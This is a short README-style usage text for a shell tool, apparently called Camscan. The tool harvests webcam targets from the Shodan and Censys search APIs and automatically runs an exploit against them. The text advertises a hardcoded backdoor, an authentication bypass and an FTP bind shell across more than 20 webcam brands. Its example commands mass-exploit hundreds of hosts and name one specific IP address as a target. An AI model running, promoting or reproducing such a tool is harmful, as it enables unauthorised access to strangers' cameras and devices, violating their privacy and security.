Camscan scripts using shodan and censys to get target ip:port The exploit is for over 20 brnds of webcams that all have the hardcoded backdoor, authenticatiob bypass, the ftp bind shell,
###################################################
################################################### Usage : -c/--count # how many targets should be pulled from api -e/--exploit # run exploit on found targets -a/--api # Choose api (0)censys.io (1)shodan.io -h/--help # show this help Example : ./cam_scan.sh --api 0 --count 100 --exploit ./camscan.sh -a censys -e -c 500 -d ./camscan.sh -a shodan -e -c 500 -d ./camscan.sh -a single -e -i 193.250.224.180:80 ./camscan.sh -e -f <IP:PORT list>
Files can be found in /root/.Cam_Scan/output/
support [email protected]